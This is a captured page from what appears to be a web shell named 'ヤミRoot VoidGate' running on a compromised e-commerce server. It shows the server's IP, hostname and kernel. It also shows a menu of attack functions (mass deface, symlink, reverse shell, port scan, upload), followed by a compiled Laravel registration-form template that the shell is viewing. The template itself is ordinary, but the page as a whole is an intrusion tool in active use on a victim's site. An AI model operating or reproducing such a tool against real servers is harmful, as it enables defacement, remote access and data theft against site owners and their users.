ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: c693e2a0416563cfcc73693a2dfa060a.php
<?php $__env->startSection('title', translate('register')); ?> <?php $__env->startPush('css_or_js'); ?> <link rel="stylesheet" href="<?php echo e(theme_asset(path: 'public/assets/front-end/plugin/intl-tel-input/css/intlTelInput.css')); ?>"> <?php $__env->stopPush(); ?> <?php $__env->startSection('content'); ?> <div class="container py-4 __inline-7 text-align-direction"> <div class="login-card"> <div class="mx-auto __max-w-760"> <h2 class="text-center h4 mb-4 font-bold text-capitalize fs-18-mobile"><?php echo e(translate('sign_up')); ?></h2> <form class="needs-validation_" id="customer-register-form" action="<?php echo e(route('customer.auth.sign-up')); ?>" method="post"> <?php echo csrf_field(); ?> <div class="row"> <div class="col-sm-6"> <div class="form-group"> <label class="form-label font-semibold"> <?php echo e(translate('first_name')); ?> <span class="input-required-icon">*</span> </label> <input class="form-control text-align-direction" value="<?php echo e(old('f_name')); ?>" type="text" name="f_name" placeholder="<?php echo e(translate('Ex')); ?>: <?php echo e(translate('Jhone')); ?>" required> <div class="invalid-feedback"><?php echo e(translate('please_enter_your_first_name')); ?>!</div> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="form-label font-semibold"> <?php echo e(translate('last_name')); ?> <span class="input-required-icon">*</span> </label> <input class="form-control text-align-direction" type="text" value="<?php echo e(old('l_name')); ?>" name="l_name" placeholder="<?php echo e(translate('ex')); ?>: <?php echo e(translate('Doe')); ?>" required> <div class="invalid-feedback"><?php echo e(translate('please_enter_your_last_name')); ?>!</div> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="form-label font-semibold"> <?php echo e(translate('email_address')); ?> <span class="input-required-icon">*</span> </label> <input class="form-control text-align-direction" type="email" value="<?php echo e(old('email')); ?>" name="email" placeholder="<?php echo e(translate('enter_email_address')); ?>" autocomplete="off" required> <div class="invalid-feedback"><?php echo e(translate('please_enter_valid_email_address')); ?>!</div> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="form-label font-semibold"> <?php echo e(translate('phone_number')); ?> <span class="input-required-icon">*</span> </label> <input class="form-control text-align-direction phone-input-with-country-picker" type="tel" value="<?php echo e(old('phone')); ?>" name="phone" placeholder="<?php echo e(translate('enter_phone_number')); ?>" required> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="form-label font-semibold"> <?php echo e(translate('password')); ?> <span class="input-required-icon">*</span> <small class="text-danger mx-1 password-error"></small> </label> <div class="password-toggle rtl"> <input class="form-control text-align-direction" name="password" type="password" id="si-password" placeholder="<?php echo e(translate('minimum_8_characters_long')); ?>" required> <label class="password-toggle-btn"> <input class="custom-control-input" type="checkbox"><i class="tio-hidden password-toggle-indicator"></i><span class="sr-only"><?php echo e(translate('show_password')); ?> </span> </label> </div> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="form-label font-semibold"> <?php echo e(translate('confirm_password')); ?> <span class="input-required-icon">*</span> </label> <div class="password-toggle rtl"> <input class="form-control text-align-direction" name="con_password" type="password" placeholder="<?php echo e(translate('minimum_8_characters_long')); ?>" id="si-confirm-password" required> <label class="password-toggle-btn"> <input class="custom-control-input text-align-direction" type="checkbox"> <i class="tio-hidden password-toggle-indicator"></i> <span class="sr-only"><?php echo e(translate('show_password')); ?></span> </label> </div> </div> </div> <?php if($web_config['ref_earning_status']): ?> <div class="col-sm-12"> <div class="form-group"> <label class="form-label font-semibold"><?php echo e(translate('refer_code')); ?> <small class="text-muted">(<?php echo e(translate('optional')); ?>)</small></label> <input type="text" id="referral_code" class="form-control" name="referral_code" placeholder="<?php echo e(translate('use_referral_code')); ?>"> </div> </div> <?php endif; ?> </div> <div class="col-12"> <div class="row g-3"> <div class="col-sm-6"> <div class="rtl"> <label class="custom-control custom-checkbox m-0 d-flex"> <input type="checkbox" class="custom-control-input" name="remember" id="inputChecked"> <span class="custom-control-label"> <span><?php echo e(translate('i_agree_to_Your')); ?></span> <a class="font-size-sm text-primary text-force-underline" target="_blank" href="<?php echo e(route('business-page.view', ['slug' => 'terms-and-conditions'])); ?>"><?php echo e(translate('terms_and_condition')); ?></a> </span> </label> </div> </div> <div class="col-sm-6"> <?php if($web_config['firebase_otp_verification'] && $web_config['firebase_otp_verification']['status']): ?> <div class="generate-firebase-auth-recaptcha" id="firebase-auth-recaptcha-<?php echo e(rand(111, 999)); ?>"></div> <?php elseif(isset($recaptcha) && $recaptcha['status'] == 1): ?> <div class="dynamic-default-and-recaptcha-section"> <input type="hidden" name="g-recaptcha-response" class="render-grecaptcha-response" data-action="customer_auth" data-input="#login-default-captcha-section" data-default-captcha="#login-default-captcha-section" > <div class="default-captcha-container d-none" id="login-default-captcha-section" data-placeholder="<?php echo e(translate('enter_captcha_value')); ?>" data-base-url="<?php echo e(route('g-recaptcha-session-store')); ?>" data-session="<?php echo e('default_recaptcha_id_customer_auth'); ?>" > </div> </div> <?php else: ?> <div class="default-captcha-container" data-placeholder="<?php echo e(translate('enter_captcha_value')); ?>" data-base-url="<?php echo e(route('g-recaptcha-session-store')); ?>" data-session="<?php echo e('default_recaptcha_id_customer_auth'); ?>" > </div> <?php endif; ?> </div> </div> </div> <div class="web-direction"> <div class="mx-auto mt-4 __max-w-356"> <button class="w-100 btn btn--primary" id="sign-up" type="submit" disabled> <?php echo e(translate('sign_up')); ?> </button> </div> <?php if($web_config['social_login_text']): ?> <div class="text-center m-3 text-black-50"> <small><?php echo e(translate('or_continue_with')); ?></small> </div> <?php endif; ?> <div class="d-flex justify-content-center my-3 gap-2"> <?php if( isset($web_config['customer_login_options']['social_login']) && $web_config['customer_login_options']['social_login'] ): ?> <?php $__currentLoopData = $web_config['customer_social_login_options']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $socialLoginServiceKey => $socialLoginService): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($socialLoginService && $socialLoginServiceKey != 'apple'): ?> <a class="d-block" href="<?php echo e(route('customer.auth.service-login', $socialLoginServiceKey)); ?>"> <img src="<?php echo e(theme_asset(path: 'public/assets/front-end/img/icons/' . $socialLoginServiceKey . '.png')); ?>" alt="<?php echo e(translate($socialLoginServiceKey)); ?>"> </a> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endif; ?> </div> <div class="text-black-50 mt-3 text-center"> <small> <?php echo e(translate('Already_have_account ')); ?>? <a class="text-primary text-underline" href="<?php echo e(route('customer.auth.login')); ?>"> <?php echo e(translate('sign_in')); ?> </a> </small> </div> </div> </form> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.front-end.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /home/pollibazaar/public_html/resources/themes/default/web-views/customer-views/auth/register.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick